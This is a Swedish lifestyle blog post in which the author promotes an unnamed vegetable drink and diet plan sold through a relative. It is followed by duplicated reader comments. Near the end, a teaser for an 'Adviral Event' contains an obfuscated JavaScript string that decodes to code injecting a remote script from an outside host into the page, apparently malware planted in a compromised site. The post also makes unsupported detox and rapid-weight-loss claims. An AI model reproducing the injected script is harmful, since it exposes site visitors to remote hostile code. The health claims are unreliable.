kostschema!

FullSizeRender 9

Hej min vän!

-Äntligen ska ni få tillgång till min grönsaksdryck!

Nu är ni hundratals som mailar och frågar mig VARJE dag om min ”grönsaksdryck” och mitt kostschema. Jag har låtit er ta del utav min vikt och lagt upp resultatet att jag gått ner -4,9 kg på 9 dagar.

jag gör detta som ett lite längre inlägg där jag försöker att svara på era frågor så gott  jag kan…  Har du fler frågor, tveka inte att ställa dom. jag svarar i ,mån utav tid =)

Jag har provat och utvärderat produkterna….

Jag har följt mitt kostschema,men inte slavsikt. Jag har unnat mig en bloggträff som innehöll en del alkohol, jag var på Finest Awards som också innehöll alkohol. Samt nere i Ystad i helgen och firade påsk med familj och vänner… vilket också innehöll alkohol.

Alkohol triggar sötsuget och innehåller EXTREMT mycket socker, INTE bra!

-Jösses nu låter det som jag är alkoholist, det är jag givetvis inte 😉

Jag har provat produkterna och bekantat mig med dessa. Jag har sakta men säker börjat ändra mitt tanke sätt och få in en rutin i att äta ofta. 

Längre ner i detta inlägg kommer ni att få kontaktuppgifterna till min kostrådgivare så kan ni själva ta del utav informationen och beställa kost-tillskott och kostschema genom honom.

 Jag har INTE haft som avsikt att hålla er på halster, men ville precis som jag skrivit innan verkligen veta vad jag står i frågan gällande produkterna, då det för mig är jätte viktigt att jag kan stå för det jag promotar.

 Jag har bestämt mig för att jag tycker om produkterna och har utvärderat dom väl….

 Hittills så har jag inte skött mig helt då man första månaden egentligen inte ska dricka alkohol för att göra en ordentlig utrensning!  Så för min del så börjar jag ”på riktigt” imorgon.

-bye bye champagne… *Ingen alkohol på 1 månad!

*undantag den 17/4,  23/4, 26/4 då är det ju de där eventet….

-Nej! nu skojar jag bara…

men det är precis så där det brukar låta för min del! Jag hittar alltid ursäkter för dom där speciella tillfällena… Men vad tusan är en månad utav ens liv? Nu känner jag att jag behöver göra denna uppoffringen! 

Nu vill jag boosta min kropp med mycket energi, sund kost och samtidigt göra en rejäl utrensning! Så det blir absolut ingen alkohol! 

IMG_6230

Ni som har följt mig länge vet redan om detta, men för er som är nya här så gör jag en lång historia kort.  Jag har en son, Ludvig 4 år. Jag driver två företag, pendlar mellan Stockholm, Holland och Kalmar/Öland där butiken My’s Blommor ligger.  

Jag har varit själv med Lilleman sedan han bara var ett par veckor gammal. Nu är han även varannan vecka hos sin pappa. Att få ihop livet som ensamstående och egenföretagare är ett evigt pussande och planerande. Men med min ständigt positiva inställning så går allting att lösa. Men hälsan är A & O för att få mitt liv att gå ihop!

Jag har tidigare vägt strax under 100kg. 

(detta var ca 1år innan Ensam Mamma Söker)

Jag har alltid varit en periodare. Gått upp och ner i vikt.

Jag har JÄTTE lätt för att gå upp i vikt. När jag känner att jag ”tappar” det så hetsäter jag…. Om jag har ”syndat” så tycker jag redan att jag har förstört dagen och kan då fortsätta trycka i mig, på ett helt okontrollerat sätt. 

-Jag kan jämföra det med en ätstörning, fast tvärt om.

Det finns inget stopp! Som jag skrivit tidigare, jag kan äta ett HELT paket Ballerina OCH en påse popcorn plus en chokladboll från 7-eleven som jag dessutom äter upp i ”smyg” påvägen hem i bilen när ingen ser…

-Inte helt sundt, jag vet 😉 

När det är stressiga perioder, så kan jag svepa 10 koppar kaffe innan dagen är slut, kedjeröka till dessa och samtidigt ”glömma bort” att äta, hoppa över både lunch och mellanmål, och då på kvällen äta jätte mycket när jag väl kommer på att jag är hungrig. Vad händer när man gör så? Jo an förstör sin ämnesomsättning…

Jag har under 4-5år levt så otroligt osundt att det inte finns några ursäkter längre. -den som mår sämst utav det är ju jag själv… 

Jag har kommit en bra bit på vägen…. Jag har slutat röka. Jag har börjat äta regelbundet och det har fått fantastiska resultat bara senaste veckorna då jag har provat både kostschemat och produkterna. 

imageDenna bilden lägger jag upp med jämna mellanrum för att påminn a mig själv…

Jag vägde inte riktigt som mest på den vänstra bilden, det var värre. Men jag var ändå kraftig.

På den högra bilden hade jag min målvikt 59-60 kg. Där jag ska ligga.

Jag är ca 7kg ifrån det idag. -Min målvikt är alltså ca 60kg.

Jag är 170cm lång och mår som bäst när jag kan hålla min målvikt. 

image

Motivation är ingenting du får, det är någonting du skapar!

Glöm aldrig det. Jag vill inte sätta igång någon viktpress eller hets bantning här inne. Det förespråkar jag INTE! Utan jag vill peppa och uppmuntra till att börja någonstans…. Man kan äta GOTT och nyttigt. Man kan få stora resultat utav små förändringar…

Jag har äntligen hittat ett sunt sätt att kontrollera min kost. Innan har jag lidit utav blodsockerfall, dålig sömn, sötsug och ångest när jag hetts-ätit i blodsockerfallen…..

-Det ska bli ett minne blott!

Dessutom har jag haft världens sämsta immunförsvar och åkt in och ut på sjukhus, senaste åren. -Katastrofala värden! 

För att orka vara en bra och pigg mamma så är det viktigt att må bra på insidan.

För att prestera företagsmässigt och hantera stress och olika situationer så vill jag vara både fysiskt och psykiskt stark.

Därför har jag börjat min förändring mot ett nyttigare och hälsosammare liv. 

Min grönsaks dryck är inte en måltidsersättning, utan ett vitamin och mineral tillskott.

Det är jätte vanligt att man inte får i sig den mängd grönsaker som vi egentligen behöver, men med denna drycken så får man det.

Jag vill inte kalla detta för diet eller bantning, utan ett kostschema.

Det går ut på att äta regelbundet och ofta. Jag äter mer än jag gjort tidigare. Ni har fått se mina nötfärsbiffar, det har för mig blivit storfavoriten då man kan äta dom både varma och kalla samtidigt som dom är lätta att ha med sig när man är på resande fot…

Men man får också variera detta med lax, kalkon, omelett och kyckling, tex. Hela kostschemat får ni ta med min Mosters man Kari. 

Här är bilden jag la upp precis innan min bukplastik. Jag kan fortfarande inte börja träna ordentligt än, då jag fortfarande läker.

Men smyger igång med promenader och balans övningar, jag går sedan ett par dagar tilllbaka 40 min omdagen =)

image

 

Idag börjar min 28dagars kur.

-Jag är såååå förväntansfull och taggad på detta!

Jag var lite skeptisk i början. Därför har dessa veckorna varit viktiga för mig att i lugn och ro prova mig fram. Jag kommer blogga på som vanligt med min vardag, men jag kommer också att fortsätta ge tips och råd och framförallt pepp till er alla som också försöker komma igång med träning och kost. Jag är på ruta ett just nu. Så känner du att du vill hänga med mot ett nyttigare och hälsosammare liv, så är du varmt välkommen. Du behöver inte göra som jag…. men vi kan peppa varandra och sprida en härlig energi… 

Jag har ju själv precis påbörjat min resa mot ett nyttigare liv. jag är helt otränad och har varit en kedjerökande soffpotatis. Men kan redan känna mig piggare sen jag börjat äta regelbundet och slutat röka =) -på bara ett par veckor!

-kan jag så kan du! 😉

Nästa vecka flyger jag mot Marbella för en träningsresa. Jag har skräddarsytt träningsprogram då jag inte kunnat träna sedan min bukplastik där jag sytt ihop mina bukmuskler som glipade 6.5 m. En bukplastik som jag inte ångrat en sekund efter att jag gjort den. Jag väntade i flera år innan jag vågade, men nu när jag ser resultatet och snart när jag kommer att kunna börja träna, även kan träna min mage igen  =)- Lycka! 

Idag fortsätter jag mitt  kostschema, med samma produkter  som jag har provat senaste veckorna, och några nya produkter som jag fick hem i fredags.Då jag bestämt mig för att jag tycker att detta är ett upplägg som funkar för mig. Äta nyttigt, så pass ofta att man inte hinner bli hungrig, man tappar sötsuget på ett par dygn och sover bättre om nätterna….. 

-NU j*klar 😉

Jag kan INTE skriva ut här vad produkterna heter då det strider emot kontraktet och samarbetspartner.  Men vill du veta mer om dessa så är du välkommen att maila min mosters man. Min moster och hennes man är två personer som vigt sitt liv åt idrotten. Den ena tränar inför VM och är Ultra-Triatlet. Den andra är PT, kostrådgivare, utbildad förbundskapten och båda två har vigt sitt liv åt idrotten. Som jag har skrivit tidigare så kan jag knappast ha ett bättre team bakom mig =) 

image

image

image

Om du är intresserad utav ett kostschema och min grönsaks dryck så kan du kontakta Kari genom att maila honom på kari@karimartens.se 

Jag själv är varken PT eller kostrådgivare, jag kan bara rekommendera detta då jag tycker att det fungerar bra för mig =)

Om en månad är jag tagit mig igenom min 28dagars kur kommer jag att lägga upp före/efter bilder och självklart uppdatera under resans gång…. 

Nu Ska jag köra över till Öland och lämna Lilleman hos sin pappa. Sedan vidare  mot Tingsryd och hämta upp mina kunder som ska följa med mig till Holland idag =)

Ha en skön dag! /Kramar My Martens

 

 

 

21 Komentarer

 1. Hej!
  Vad spännande My! Du verkar så taggad och det sprider du här, tack!
  Jag slutade äta godis och fikagott för 21 dgr sen idag. Känner mig fräschare och det var inte så svårt o jobbigt som jag föreställde mig. Jag ville prova detta för se o känna hälsoeffekterna som så många ofta pratar om.
  Tack för att du delar med dig, du är en inspiration!
  Lycka till med 28 dgr kuren, det fixar du!
  Ha en fin söndag

 2. Hej!
  Vad spännande My! Du verkar så taggad och det sprider du här, tack!
  Jag slutade äta godis och fikagott för 21 dgr sen idag. Känner mig fräschare och det var inte så svårt o jobbigt som jag föreställde mig. Jag ville prova detta för se o känna hälsoeffekterna som så många ofta pratar om.
  Tack för att du delar med dig, du är en inspiration!
  Lycka till med 28 dgr kuren, det fixar du!
  Ha en fin söndag

 3. Hej! Känns det bättre med din mage nu? Har du fortfarande ont o få ta värktabletter? Fick du många sprutor innan dom opererade dig? Isåfall var fick du dom?
  Kram

 4. Hej! Känns det bättre med din mage nu? Har du fortfarande ont o få ta värktabletter? Fick du många sprutor innan dom opererade dig? Isåfall var fick du dom?
  Kram

 5. Hej, angående din operation. Hur kom det sig att du valde just den kliniken. Jag bor i Göteborg och har börjat titta runt lite. Men tycker det är så svårt med att välja. Läser rekomendationer men det är både ris och ros på alla känns det som.

 6. Hej, angående din operation. Hur kom det sig att du valde just den kliniken. Jag bor i Göteborg och har börjat titta runt lite. Men tycker det är så svårt med att välja. Läser rekomendationer men det är både ris och ros på alla känns det som.

 7. Hej.
  Mailade Kari ang grönsaksdrycken. Men det bmev bara sändningsfel… ?
  Hjälp…??
  Bra kämpat måste jag oxå skriva!! Ser mkt fram emot att få följa med i din vikt/kost-resa! ?
  //amelie

 8. Hej.
  Mailade Kari ang grönsaksdrycken. Men det bmev bara sändningsfel… 🙁
  Hjälp…??

  Bra kämpat måste jag oxå skriva!! Ser mkt fram emot att få följa med i din vikt/kost-resa! 🙂

  //amelie

 9. Men My, du är väl pt och kostrådgivare? Hade du inte gått en sån där utbildning? Du kan nog mer än vad du tror, det handlar bara om att det är svårt att gå på egna kunskaper ibland.

  • Ja, visst är jag det =) Men det är mycket roligare och ger mig mer motivation att göra en utmaning tillsammans med någon, i detta fallet med Ako min kollega i våra kommande projekt =) Det handlar inte alltid bara om just kunskap… Utan om motivation och att lyfta upp varandra där man är som svagast =) -Trevlig helg!

 10. Men My, du är väl pt och kostrådgivare? Hade du inte gått en sån där utbildning? Du kan nog mer än vad du tror, det handlar bara om att det är svårt att gå på egna kunskaper ibland.

  • Ja, visst är jag det =) Men det är mycket roligare och ger mig mer motivation att göra en utmaning tillsammans med någon, i detta fallet med Ako min kollega i våra kommande projekt =) Det handlar inte alltid bara om just kunskap… Utan om motivation och att lyfta upp varandra där man är som svagast =) -Trevlig helg!

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/